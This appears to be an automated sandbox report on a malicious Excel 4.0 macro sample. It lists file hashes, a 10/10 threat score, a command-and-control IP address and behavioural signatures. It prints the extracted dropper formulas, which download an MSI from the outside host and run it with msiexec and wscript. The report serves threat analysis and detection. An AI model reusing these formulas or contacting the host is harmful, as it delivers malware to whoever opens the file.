General

  • Target

    7395615d46a795b61c1ef4b0104ab4c4

  • Size

    6KB

  • Sample

    231222-gn21saabfm

  • MD5

    7395615d46a795b61c1ef4b0104ab4c4

  • SHA1

    43d91072f07b040d96aa69deb7e5b19c8f5c4b39

  • SHA256

    66fbe0d7434c7d9f1d801bdc2270a83b0fe575d1cae1066d480cbc5322ad5fbb

  • SHA512

    85ec2c75b5c2b0e18ce926a14729720f923ea8154edea2d60e097d1b041293a9a87e2fdfa2660a3d824da592a8dc4e39f5b8f8a83da45c73f0aa5a1a82d29f5c

  • SSDEEP

    192:NDSGuS+1aEOmmfRL8UhHFBFYutb98yu10s:NNuvwZ1FY8b98yuKs

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187

Attributes
  • formulas

    =EXEC("msiexec.exe")
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0)
    =EXEC("wscript C:\ProgramData\start.vbs")
    =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15
